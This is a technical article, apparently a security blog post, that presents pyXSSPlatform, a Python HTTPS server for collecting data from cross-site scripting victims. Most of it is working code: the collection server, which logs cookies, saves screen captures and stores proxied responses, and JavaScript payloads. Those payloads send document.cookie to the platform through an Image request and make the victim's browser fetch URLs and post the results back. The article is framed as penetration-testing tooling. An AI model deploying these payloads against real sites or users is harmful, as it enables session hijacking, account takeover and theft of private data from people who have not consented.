0x00 Preface
---
An XSS platform makes it easier to test XSS vulnerabilities and collect the key information they expose. Many online XSS platforms are available, and one can also build one's own.
However, if the test target cannot reach external networks, a lightweight XSS platform has to be set up inside the internal network, and it must be easy to install and run on any operating system.
I have not yet found a suitable open-source tool, so I plan to write a command-line tool using Python to provide the functionality of an XSS platform.
0x01 Introduction
---
This article will cover the following topics:
- Design Approach
- Implementation Details
- Open Source Code
0x02 Design Approach
---
Following the XSS platform model, the command-line tool needs to provide the following functionalities:
1. Create an HTTPS server to provide web services
2. Distinguish different types of data, extract key content, and save it
3. Modularize functions for easy secondary development
0x03 Implementation Details
---
1. Create an HTTPS server to provide web services
First, create a certificate. With openssl the following command suffices:

```shell
openssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650 -nodes
```

This generates the file https_svr_key.pem, which holds both the private key and the self-signed certificate (the same path is given to -keyout and -out).
Python3 test code for creating an HTTPS server:

```python
import ssl
from http.server import HTTPServer, SimpleHTTPRequestHandler

# Serve the current directory over HTTPS using the certificate generated above
# (key and certificate are both stored in https_svr_key.pem).
httpd = HTTPServer(('0.0.0.0', 443), SimpleHTTPRequestHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='https_svr_key.pem')
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```

The above code creates a web server that speaks HTTPS, with functionality similar to `python -m SimpleHTTPServer 8000` (`python3 -m http.server 8000` in Python 3), except that the content is served over TLS.
2. Distinguish different data, extract key content and save
The request-processing module RequestHandler has to be customized so that it handles GET and POST requests separately.
The code for handling GET requests is as follows:

```python
from http.server import SimpleHTTPRequestHandler

class RequestHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        print(self.headers)  # request headers; the User-Agent identifies the browser
        if 'cookie' in self.path:
            # custom convention: the query string of the request carries the cookie data
            with open('cookie.txt', 'a') as f:  # file name chosen here for illustration
                f.write(self.path + '\n')
            self.send_response(200)
            self.end_headers()
            return
        super().do_GET()  # otherwise serve files (for example index.js) as usual
```

Here print(self.headers) outputs the headers of the GET request; the User-Agent header identifies the user's browser.
To obtain user cookies, a custom format is used: if the GET request path contains the string 'cookie', the request content is written to a file so that the collected cookies are stored.
The code for handling POST requests is as follows:

```python
import base64
import urllib.parse
from http.server import SimpleHTTPRequestHandler

class RequestHandler(SimpleHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        raw = self.rfile.read(length).decode()
        # the body arrives as field=value; percent-decode the value (see the note below)
        value = urllib.parse.unquote(raw.partition('=')[2] or raw)
        if self.path == '/screen':                 # (1) user screen capture
            with open('screen.png', 'wb') as f:    # file names chosen here for illustration
                f.write(base64.b64decode(value))
        elif self.path == '/data':                 # (2) result of a controlled HTTP request
            with open('data.html', 'w') as f:
                f.write(value)
        else:                                      # (3) default: print the parameters
            print(value)
        self.send_response(200)                    # every POST is answered 200 "Success"
        self.end_headers()
        self.wfile.write(b'Success')
```

The above code answers every POST request with status code 200 and the text "Success".
It dispatches on the request path to one of the following three functions:
(1) Save the user's screen capture
Request path: /screen
The image data is taken from the POST parameters, Base64-decoded and saved.
(2) Make the user's browser send an HTTP request to a specified address and save the result
Request path: /data
The data is taken from the POST parameters and saved.
(3) Default function
The POST parameters are printed to the command line.
Note:
In all three cases the extracted content must first be decoded with urllib.parse.unquote().
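To exercise the three POST routes and the decoding step without a socket, the dispatch logic can be factored into a plain function. This is an added example, not code from pyXSSPlatform; the field=value body layout, the stripping of a canvas-style data-URL prefix for /screen, and the use of strict Base64 validation are assumptions made here.

```python
import base64
import urllib.parse

# Assumed: a screen capture may arrive as canvas.toDataURL() output, which
# carries this prefix in front of the Base64 payload.
SCREEN_PREFIX = "data:image/png;base64,"


def parse_post(path, raw_body):
    """Return (kind, payload) for one POST body of the form field=value.

    kind is "screen" (payload: decoded PNG bytes), "data" (payload: the
    decoded text to store as .html) or "print" (payload: decoded text for
    the default route).
    """
    field, sep, value = raw_body.partition("=")
    if not sep:
        value = field  # no field name: treat the whole body as the value
    # urllib.parse.unquote leaves '+' untouched. unquote_plus would turn the
    # '+' characters that legitimately occur in Base64 into spaces and corrupt
    # the image, which is why the platform decodes with unquote().
    value = urllib.parse.unquote(value)
    if path == "/screen":
        if value.startswith(SCREEN_PREFIX):
            value = value[len(SCREEN_PREFIX):]
        # validate=True rejects anything that is not Base64 instead of silently
        # dropping characters, so a mangled upload does not produce a broken file
        return "screen", base64.b64decode(value, validate=True)
    if path == "/data":
        return "data", value
    return "print", value
```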
3. Modular functionality for easy secondary development
The default access address of the XSS platform is: https:///index.js
Once the HTTPS server is running, you only need to edit index.js in the same directory as the Python script.
The following describes the functionality implemented in the two JS payload scripts:
(1) Retrieve user cookies
User cookies are read with document.cookie (cookies set with the HttpOnly attribute are not exposed to document.cookie and therefore cannot be read this way).
When sending the cookie data back, the Image object can be used to avoid cross-origin restrictions. Example code:

```javascript
var serverUrl = "https:///cookie";//change this
var img = new Image();
img.onload = function () { /* the server answered with an image */ };
img.onerror = function () { /* no image came back, but the request was still sent */ };
// the cookie travels in the query string of a GET request, which is not subject to CORS
img.src = serverUrl + "?" + encodeURIComponent(document.cookie);
```

The Image object can only send GET requests and cannot read the response content; whether a response arrived at all can only be observed through the onerror and onload events.
(2) Sending HTTP requests via JavaScript
HTTP requests can be GET or POST, and the synchronous and asynchronous ways of sending them have to be distinguished.
With a synchronous call, the caller blocks until the method returns before doing anything else. To send the result back to the server, the response can be obtained from the return value and then transmitted.
With an asynchronous call, the method returns immediately. To send the result back to the server, a callback function is used instead.
A callback function, put simply, is a function that is passed as a parameter to another function and called from there.
For example, the following code:
```javascript
function test1(callback) {
    callback(1);        // call the function that was passed in as a parameter
}
function test2(value) {
    console.log(value);
}
test1(test2);           // prints 1
```
After executing the code, 1 will be output to the console
In summary, to send a GET data packet to a specified URL and return the request result to the server, two methods can be used:
Method 1: Synchronous method
```javascript
function initialize() {
    var url = "https:///";//change this: address to request
    var xhr = new XMLHttpRequest();
    xhr.open("GET", url + "?t=" + Math.random(), false); // false = synchronous
    xhr.send();                 // blocks until the response has arrived
    return xhr.responseText;    // result is available as soon as send() returns
}
function sendBack(result) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:///data", true);//change this: platform address
    xhr.send("data=" + encodeURIComponent(result));
}
sendBack(initialize());
```
Method 2: Asynchronous Method + Callback Function
```javascript
function initialize(callback) {
    var url = "https:///";//change this: address to request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4) {     // response complete: hand it to the callback
            callback(xhr.responseText);
        }
    };
    xhr.open("GET", url + "?t=" + Math.random(), true); // true = asynchronous
    xhr.send();                         // returns immediately
}
function sendBack(result) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:///data", true);//change this: platform address
    xhr.send("data=" + encodeURIComponent(result));
}
initialize(sendBack);
```
Note:
The parameter "?t=" + Math.random() is appended to the request so that a cached copy of the page is not returned instead of a fresh response.
When a cross-origin request is sent from Chrome, the console reports that it was blocked by the CORS policy. The request is still sent and the server still receives it; what the browser withholds is access to the response from the script, unless the target answers with permissive CORS headers.
0x04 Open Source Code
---
The complete code has been open-sourced at the following address:
An open-source project
pyXSSPlatform can be run directly from the command line and supports the following three functions:
- GetCookie, obtains user cookies and saves them as .txt files
- CaptureScreen, captures the user's screen and saves it as a .png file
- GET/POST, controls the user to send HTTP data packets to a specified address, with results saved as .html files
Usage:
(1) Generate a self-signed certificate with openssl, for example:

```shell
openssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650 -nodes
```

(2) Edit the file index.js
Fill in the JS code to be loaded; code templates can be found in the files under Payload_Template.
(3) Start the web server, for example:

```shell
pyXSSPlatform.py 192.168.1.1 443 https_svr_key.pem
```
At this point, the startup address of the XSS platform is as follows:
https://192.168.1.1/index.js
index.js can be modified at any time to make the users' browsers execute different functions.
0x05 Summary
---
This article introduces the method of building an HTTPS server with Python and implementing an XSS platform via command line, using the open-source tool pyXSSPlatform. It is easy to operate, supports cross-platform running, and allows for secondary development.